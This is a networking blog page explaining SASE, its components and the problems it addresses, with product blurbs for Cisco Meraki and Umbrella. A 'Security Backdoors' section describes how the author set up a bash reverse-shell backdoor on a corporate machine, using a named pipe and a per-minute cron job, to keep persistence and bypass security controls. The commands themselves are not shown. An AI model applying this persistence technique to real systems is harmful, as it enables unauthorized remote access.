a) Comprehensive Assessment: Before adopting Zero Trust SASE, organizations should conduct a thorough assessment of their existing security and networking infrastructure, identify vulnerabilities, and define their security requirements.

b) Architecture Design: Organizations must design a robust architecture that aligns with their needs and integrates Zero Trust principles into their existing systems. This may involve deploying virtualized security functions, adopting SD-WAN technologies, and leveraging cloud services.

c) Continuous Monitoring and Adaptation: Zero Trust SASE is an ongoing process that requires continuous monitoring, analysis, and adaptation to address emerging threats and evolving business needs. Regular security audits and updates are crucial to maintaining a solid security posture.

Conclusion: Zero Trust SASE represents a paradigm shift in cybersecurity, providing a comprehensive and unified approach to secure access and network management. By embracing the principles of Zero Trust and leveraging the capabilities of SASE, organizations can enhance their security, improve performance, and simplify their network infrastructure. As the digital landscape continues to evolve, adopting Zero Trust SASE is not just an option—it’s necessary to safeguard our interconnected world’s future.

rsz_secure_access_service_edge1

SASE Definition

by Publications

SASE Definition

In today's ever-evolving digital landscape, businesses are seeking agile and secure networking solutions. Enter SASE (Secure Access Service Edge), a revolutionary concept that combines network and security functionalities into a unified cloud-based architecture. In this blog post, we will delve into the definition of SASE, its components, implementation benefits, and its potential impact on the future of networking.

At its core, SASE represents a shift from traditional networking models towards a more integrated approach. It brings together wide area networking (WAN), network security services, and cloud-native architecture, resulting in a unified and simplified networking framework. SASE aims to provide organizations with secure access to applications and data from any location, while reducing complexity and improving performance.

SASE is built on several fundamental components that work together harmoniously. These include software-defined wide area networking (SD-WAN), secure web gateways (SWG), cloud access security brokers (CASB), zero-trust network access (ZTNA), and firewall as a service (FWaaS). Each component plays a crucial role in delivering a comprehensive and secure networking experience.

Implementing SASE offers numerous advantages for businesses. Firstly, it simplifies network management by consolidating various services into a single platform. This leads to increased operational efficiency and cost savings. Additionally, SASE enhances security by applying consistent policies across all network traffic, regardless of the user's location. It also improves application performance through intelligent traffic routing and optimization.

As digital transformation continues to shape the business landscape, SASE emerges as a transformative force. Its cloud-native architecture aligns perfectly with the growing adoption of cloud services, enabling seamless integration and scalability. Moreover, SASE accommodates the rise of remote work and the need for secure access from anywhere. As organizations embrace hybrid and multi-cloud environments, SASE is poised to become the backbone of modern networking infrastructure.

SASE represents a paradigm shift in networking, blending security and networking functionalities into a unified framework. By embracing SASE, organizations can streamline operations, enhance security posture, and adapt to the evolving digital landscape. As we move forward, it is essential for businesses to explore the potential of SASE and leverage its benefits to drive innovation and growth.

Matt Conran

Highlights: SASE Definition

SASE: A Cloud-Centric Approach

Firstly, the SASE is related to our environment. In a cloud-centric world, users and devices require access to services everywhere. The focal point has changed. Now, the identity of the user and device, as opposed to the traditional model, focuses solely on the data center with many network security components. These environmental changes have created a new landscape we must protect and connect.

Many common problems challenge the new landscape. Due to deployed appliances for different technology stacks, enterprises are loaded with complexity and overhead. The legacy network and security designs increase latency. In addition, the world is encrypted when considering Zero Trust SASE. This needs to be inspected without degrading application performance.

These are reasons to leverage a cloud-delivered secure access service edge (SASE). SASE means a tailored network fabric optimized where it makes the most sense for the user, device, and application – at geographically dispersed PoPs enabling technologies that secure your environment with technologies such as single packet authorization.

**Driving Forces to Adopting SASE**

Challenge 1: Managing the Network: Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each.

Challenge 2: Site Connectivity: SASE handles all management complexities. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

Challenge 3: Performance Between Locations: The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP.

Challenge 4: Cloud Agility: SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity

**Components of SASE**

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond more to changing business requirements, reduce costs, and improve overall efficiency.

Note: Point Solutions

SASE is becoming increasingly popular among organizations because it provides a more flexible and cost-effective approach to networking and security. The traditional approach involves deploying multiple devices or appliances, each with its functions. This approach can be complex, time-consuming, and expensive to manage. On the other hand, SASE simplifies this process by integrating all the necessary functions into a single platform.

Example Technology: Web Security Scanner

security web scanner

Example Product: Cisco Meraki

### Simplified Network Management

One of the standout features of the Cisco Meraki platform is its simplified network management. Gone are the days of complex configurations and time-consuming setups. With Meraki’s cloud-based interface, administrators can manage their entire network from a single dashboard. This ease of use not only saves time but also reduces the need for specialized IT staff, making it an ideal solution for businesses of all sizes.

### Robust Security Features

Security is a top priority for any network, and Cisco Meraki does not disappoint. The platform comes equipped with robust security features, including advanced threat protection, intrusion detection, and automated firmware updates. These features work seamlessly to protect your network from potential threats, ensuring that your data remains secure and your operations run smoothly.

### Scalability and Flexibility

As your business grows, so too does the need for a scalable network solution. Cisco Meraki’s platform is designed with scalability in mind, allowing you to easily add new devices and extend your network without any hassle. Whether you’re expanding to a new office location or integrating additional IoT devices, Meraki’s flexible architecture ensures that your network can grow alongside your business.

### Enhanced Visibility and Analytics

Understanding your network’s performance is crucial for making informed decisions. Cisco Meraki offers enhanced visibility and analytics, providing detailed insights into network usage, device performance, and potential issues. With these analytics, administrators can proactively address problems before they impact operations, optimize resource allocation, and ensure that their network is running at peak efficiency.

### Streamlined Troubleshooting

Troubleshooting network issues can be a daunting task, but Cisco Meraki makes it easier than ever. The platform’s intuitive dashboard provides real-time alerts and diagnostic tools, allowing administrators to quickly identify and resolve issues. This streamlined troubleshooting process minimizes downtime and keeps your network running smoothly.

**SASE Meaning: SASE wraps up**

SASE is a network and security architecture consolidating numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities along with cloud-native security functions. The functions are produced from the cloud and provided by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

**The appliance-based perimeter**

Even Though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The change for moving security controls to the cloud is for better protection and performance, plus ease of deployment and maintenance.

The initial performance of the earlier cloud-delivered solutions has been overcome with the introduction of optimized routing and global footprint. However, there is a split in opinion about performance and protection. Many consider protection and performance prime reasons to remain on-premises and keep the network security solutions on-premises.

Related: For additional pre-information, you may find the following helpful for pre-information:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE

SASE Definition

SASE Definition with Challenge 1: Managing the Network

Across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental point solution acquisitions when confronted by digital initiatives, making networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

A: Numerous integration points:

The point-solution approach addresses one issue and requires considerable integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, if we examine the network and security industry, the way it has been geared up presently is provided in parts. It’s your job to support, manage, and build the stack over time and scale it when needed. Fundamentally, it would help if you were an expert in all the different parts. However, if you abstract complexity into one platform, you don’t need to be an expert in everything. SASE is one effective way to abstract management and operational complexity.

B: Required: How SASE solves this

Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each. Essentially, with SASE, we can bring each point solution’s functionalities together and place them under one hood—the SASE cloud. SASE merges all of the networking and security capabilities into a single platform.

This way, you now have a holistic joined-up offering. Customers don’t need to perform upgrades or size and scale their network. Instead, all this is done for them in the SASE cloud, creating a fully managed and self-healing architecture. Besides, the convergence is minimal if something goes wrong in one of the SASE Pops. All of this is automatic, and there is no need to set up new tunnels or have administrators step in to perform configurations.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

A: Lack of Agility

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

B: Required: How SASE solves this

SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

The throughput is primarily determined by latency and packet loss, not bandwidth. Therefore, for an optimal experience for global applications, we must explore ways to manage the latency and packet loss end-to-end for last-mile and middle-mile segments. Most SD-WAN vendors don’t control these segments, affecting application performance and service agility.

Consequently, constant tweaking at the remote ends will be required to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth. MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.

A: Required: How SASE solves this

The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP. This way, the sites are placed on the global private backbone to take advantage of global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. The traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), and from IPsec tunnels to third-party devices. The SASE architecture optimizes the last and middle-mile traffic flows.

B: Required: Optimization techniques:

The SASE global backbone uses several techniques to improve network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations. It uses proprietary routing algorithms that factor in latency, packet loss, and jitter. These routing algorithms favor performance over cost and select the optimal route for every network packet. This is compared to Internet routing, where metrics don’t consider what is best for the application or the type.

Example TCP Performance Parameters.

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming more critical to organizations, even more so than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with the addition of new on-premises sites.

However, now, this conversation needs to encompass the cloud. Delivering cloud applications is primarily about providing an application experience that is as responsive as on-premises. However, most SD-WANs have a low response rate for rapidly offering new public cloud infrastructure. MPLS is expensive, rigid, and not built for cloud access.

A: Required: How SASE solves this

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further allows the rapid delivery of new public cloud infrastructure.

The SASE PoPs are collocated in the data centers and directly connected to the IXP of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. In addition, cloud applications are optimized through SASE’s ability to define the egress points.

This helps exit the cloud application traffic at the points closest to the customer’s application instance. The optimal global routing algorithms can determine the best path from anywhere to the customer’s cloud application instance. This provides optimal performance to the cloud applications regardless of the user’s location.

So, when we talk about performance to the cloud with SASE, the latency to the cloud is comparable to the optimized access provided by the cloud providers, such as AWS Direct Connect or Azure Express Route. So, authentically, SASE provides out-of-the-box cloud performance.

SASE Definition with Challenge 5: Security

The security landscape is constantly evolving. Therefore, network security solutions must develop to form a well-founded landscape. Ransomware and Malware will continue to be the primary security concerns from 2020 onward. Combating the various solutions designed with complex integration points scattered throughout the network domain is challenging for the entire organization.

Security must be part of any WAN transformation initiative. It must protect users and resources regardless of the underlying network, managed through a single-pane-of-glass. However, a bundle of non-integrated security products results in appliance sprawl that hinders your security posture instead of strengthening it. The security solution must defend against emerging threats like malware and ransomware. In addition, it must boost the ability to enforce corporate security policies on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

**Security and encryption**

The complexity increases due to the disparate tools required to address the different threat vectors. For example, we have DLP that can be spread across the SWG, CASB, and DLP but with three other teams managing each. What about the impact of encrypted web traffic on the security infrastructure?

The issue is that most internet traffic is now encrypted, and attackers deliver the payloads, deliver command and control instructions, and exfiltrate data over encrypted protocols. Organizations cannot decrypt all network traffic for performance reasons and avoid looking at sensitive employee information. Also, there are issues with the scalability of encrypted traffic management solutions, which can also cause performance issues.

Example Technology: Sensitive Data Protection

Sensitive data protection

Example Technology: Security Backdoors

Backdoor access refers to a hidden method or vulnerability intentionally created within a system or software that allows unauthorized access or control. It is an alternative entry point that bypasses conventional security measures, often undetected.

Using Bash: Bash, short for “Bourne Again SHell,” is a widely used command-line interpreter in Unix-based systems. It provides powerful scripting capabilities, making it a favorite among system administrators and developers. However, this versatility also brings the potential for misuse. This section will explain what a Bash backdoor is and how it functions.

Note: In the following, I created a backdoor on a corporate machine to maintain persistence within the environment. I performed bash script and system configuration using cron jobs. You will then connect to the created backdoor. Here, we demonstrate how to use tools available on standard operating system installations to bypass an organization’s security controls.

Cron jobs, derived from the word “chronos,” meaning time in Greek, are scheduled tasks that run automatically in the background of your server. They follow a specific syntax, using fields to specify when and how often a task should be executed. You can create precise and reliable automated processes by grasping the structure and components of cron jobs.


First, the file called file is deleted with the rm command if it already exists. Next, a special pipe, a new communications channel, is called a file. Any information passed to the bash terminal, such as typed commands, is transmitted to a specific IP address and port using the pipe. The | indicates the point at which the output from one Linux command passes information to the following command. You can create a network connection to a specific machine using this single line, giving a user remote access.

First, errors when running the cron task are ignored and not printed on the screen. Then, the new cronjob is printed to the screen; in this example, the backdoor bash shell will run every minute. The output of the echoed command is then written to the cronfile with crontab. 

SASE Definition with Challenge 6: MPLS and SD-WAN

MPLS does not protect resources and users, certainly not those connected to the Internet. On the other hand, SD-WAN service offerings are not all created equal since many do not include firewall/security features for threat protection to protect all edges—mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments and often leads to Malware getting past the perimeter unnoticed.

Challenge: The cost involved

Security solutions are expensive, and there is never a fixed price. Some security vendors may charge for usage models for which you don’t yet have the quantity. This makes the planning process extraordinarily problematic and complex. As the costs keep increasing, security professionals often trade off point-security solutions due to the associated costs. This is not an effective risk-management strategy.

The security controls are also limited to mobile VPN solutions. More often than not, they are very coarse, forcing IT to open access to all the network resources. Protecting mobile users requires additional security tools like next-generation firewalls (NGFWs), so we have another point solution. In addition, mobile VPN solutions provide no last—or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, allowing it to bring granular control to sites and mobile and cloud resources by enforcing the zero-trust principles for all edges. SASE provides anti-malware protection for both WAN and Internet traffic. In addition, for malware detection and prevention, SASE can offer signature and machine-based learning protection consisting of several integrated anti-malware engines.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response. Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN: The shift to the cloud, edge computing, and mobility offers new opportunities for IT professionals. Network professionals must rethink their WAN transformation approach to support these digital initiatives. WAN transformation is not just about replacing MPLS with SD-WAN. An all-encompassing solution is needed that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

Example Product: Cisco Umbrella

### What is Cisco Umbrella?

Cisco Umbrella acts as a first line of defense against internet-based threats by leveraging the cloud. It uses DNS (Domain Name System) to block malicious domains, IPs, and URLs before a connection can be established. By analyzing and learning from internet activity patterns, it can predict and prevent potential threats, ensuring that your network remains secure.

### Key Features of Cisco Umbrella

1. **DNS Layer Security**: Cisco Umbrella provides a protective shield at the DNS layer, stopping threats before they reach your network or endpoints. This means that harmful requests are blocked at the source, reducing the risk of malware infections.

2. **Secure Web Gateway**: The solution offers a secure web gateway that inspects web traffic and enforces security policies. It ensures that only safe and compliant traffic is allowed, providing an additional layer of security.

3. **Cloud-Delivered Firewall**: Cisco Umbrella includes a built-in firewall to block unwanted traffic, adding another layer of protection. This firewall can be managed from the cloud, simplifying the process of maintaining network security.

4. **Threat Intelligence**: With real-time threat intelligence updates from Cisco Talos, one of the world’s largest commercial threat intelligence teams, Cisco Umbrella ensures that your defenses are always up to date against the latest threats.

### Benefits of Using Cisco Umbrella

1. **Simplified Security Management**: Being cloud-based, Cisco Umbrella is easy to deploy and manage. There’s no need for complex hardware or software installations, reducing the burden on IT teams.

2. **Improved Visibility**: Cisco Umbrella provides comprehensive insights into internet activity across all devices and locations. This visibility helps in identifying and responding to potential threats swiftly.

3. **Enhanced User Experience**: By blocking malicious content at the DNS layer, users experience faster internet speed and reduced latency, leading to a smoother browsing experience.

4. **Scalability**: Whether you are a small business or a large enterprise, Cisco Umbrella can scale according to your needs. Its cloud-native architecture ensures that it can handle an increasing number of users and devices without compromising on performance.

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.

The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple-point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and embrace a future-ready approach.